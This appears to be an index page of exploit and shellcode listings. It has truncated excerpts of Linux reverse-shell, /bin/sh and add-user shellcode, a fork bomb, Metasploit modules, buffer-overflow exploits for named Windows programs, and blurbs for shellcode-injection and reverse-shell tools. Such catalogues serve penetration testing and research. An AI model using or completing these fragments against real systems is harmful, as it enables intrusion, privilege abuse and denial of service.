Shikata Ga Nai Encoder Still Going Strong
One of the most popular exploit frameworks in the world is Metasploit. Its vast library of pocket exploits, pluggable payload environment, and simplicity of execution make it the de facto base platform. Metasploit is used by pentesters, security enthusiasts, script kiddies, and even malicious...
Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)
Exploit Title: Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode 91 bytes Author: bolonobolo Tested on: Linux x86 Software: N/A CVE: N/A / global _start section .text _start: ;socket xor ecx, ecx ; xoring ECX xor ebx, ebx ; xoring EBX mul ebx ; xoring EAX and EDX inc cl ; ECX should be 1...
Linux/x86 - execve /bin/sh Shellcode (25 bytes)
Exploit Title: Linux/x86 - execve /bin/sh ShellCode 25 bytes Author: bolonobolo Vendor Homepage: None Software Link: None Tested on: Linux x86 CVE: N/A / global _start section .text _start: cdq ; xor edx mul edx lea ecx, [eax] mov esi, 0x68732f2f mov edi, 0x6e69622f push ecx ; push NULL in stack push...
Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)
Exploit Title: Linux/x86 - adduser 'User' to /etc/passwd ShellCode 74 bytes Author: bolonobolo Vendor Homepage: None Software Link: None Tested on: Linux x86 Comments: add user "User" to /etc/passwd CVE: N/A / 00000000 31DB xor ebx,ebx 00000002 31C9 xor ecx,ecx 00000004 66B90104 mov cx,0x401...
Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)
Exploit Title: Linux/x86 - Add User to /etc/passwd Shellcode 59 bytes Exploit Author: sagar.offsec VL43CK Guided by: Touhid M.Shaikh Designation: Security Consultant at SecureLayer7 Website: https://www.sagaroffsec.com Tested on: Ubuntu i386 GNU/LINUX Shellcode Length: 59...
ASX to MP3 converter 3.1.3.7 - (.asx) Local Stack Overflow (DEP Bypass) Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule "ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow DEP", 'Description' = %q This module exploits a stack buffer overfl...
Staying Hidden on the Endpoint: Evading Detection with Shellcode
True red team assessments require a secondary objective of avoiding detection. Part of the glory of a successful red team assessment is not getting detected by anything or anyone on the system. As modern Endpoint Detection and Response (EDR) products have matured over the years, the red teams must...
Exploit for Incorrect Default Permissions in Kramerav Viaware
Exploit Title: KRAMER VIAware 2.5.0719.1034 - Remote Code Exec...
Linux/ARM - Fork Bomb Shellcode (20 bytes)
Title: Linux/ARM - Fork Bomb Shellcode 20 bytes Category: Shellcode Tested: armv7l 32-bit Raspberry Pi 2 Model B OS: Raspbian Buster Lite Author: CJHackerz Description: This shellcode creates new processes in an infinite loop to exhaust CPU resources, leading to a crash / Compilation instruction...
Linux/x86 - NOT + XOR-N + Random Encoded /bin/sh Shellcode (132 bytes)
Date: 4th October 2019 Shellcode Author: @bolonobolo - https://bolonobolo.github.io Tested on: Linux x86 execve.asm global _start section .text _start: ; put NULL bytes in the stack xor eax, eax push eax ; //bin/sh push 0x68732f6e push 0x69622f2f mov ebx, esp ; push NULL in the EDX position push eax...
freeFTP 1.0.8 - PASS Remote Buffer Overflow
freeFTP 1.0.8 - PASS Remote Buffer Overflow Exploit Title: freeFTP 1.0.8 - Remote Buffer Overflow Date: 2019-09-01 Author: Chet Manly Software Link: https://download.cnet.com/FreeFTP/3000-21604-10047242.html Version: 1.0.8 CVE: N/A from ftplib import FTP buf = "" buf +=...
File Sharing Wizard 1.5.0 DELETE SEH Buffer Overflow
import socket from struct import Exploit Title: File sharing wizard 'DELETE' remote SEH overflow Date: 10/4/2019 Exploit Author: Striker Vendor Homepage: https://file-sharing-wizard.soft112.com/ Version: 1.5.0 Build on 26-8-2008 Tested on: Windows 7 File-sharing-wizard-seh host = "10.0.2.7" port ...
DameWare Remote Support 12.1.0.34 - Buffer Overflow (SEH) Exploit
#!/usr/bin/env python Author: Xavi Beltran Contact: [email protected] Exploit Development: https://xavibel.com/2019/08/31/seh-based-local-buffer-overflow-dameware-remote-support-v-12-1-0-34/ Date: 14/7/2019 Description: SEH based Buffer Overflow DameWare Remote Support V. 12.1.0.34 Tools Computer...
ThreadBoat - Program Uses Thread Execution Hijacking To Inject Native Shellcode Into A Standard Win32 Application
Program uses Thread Hijacking to Inject Native Shellcode into a Standard Win32 Application. With Thread Hijacking, it allows the hijacker.exe program to suspend a thread within the target.exe program allowing us to write shellcode to a thread. Usage int main System sys; Interceptor incp; Exceptio...
Windows Manage Memory Shellcode Injection Module
This module will inject into the memory of a process a specified shellcode. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windows Manage Memory Shellcode Injection Module', 'Description' = %q...
DameWare Remote Support 12.1.0.34 - Buffer Overflow (SEH)
DameWare Remote Support 12.1.0.34 - Buffer Overflow SEH #!/usr/bin/env python Author: Xavi Beltran Contact: [email protected] Exploit Development: https://xavibel.com/2019/08/31/seh-based-local-buffer-overflow-dameware-remote-support-v-12-1-0-34/ Date: 14/7/2019 Description: SEH based...
Exploit for Use After Free in Microsoft
Run msfconsole meterpreter/multi/handler to listen on 192.1...
HRShell - An Advanced HTTPS/HTTP Reverse Shell Built With Flask
HRShell: An advanced HTTPS Reverse Shell built with Flask HRShell is an HTTPS/HTTP reverse shell built with Flask. It's compatible with Python 3.x and has been successfully tested on: Linux Ubuntu 18.04 LTS, Kali Linux 2019.3, macOS Mojave, Windows 7/10 Features It's stealthy TLS support Either usin...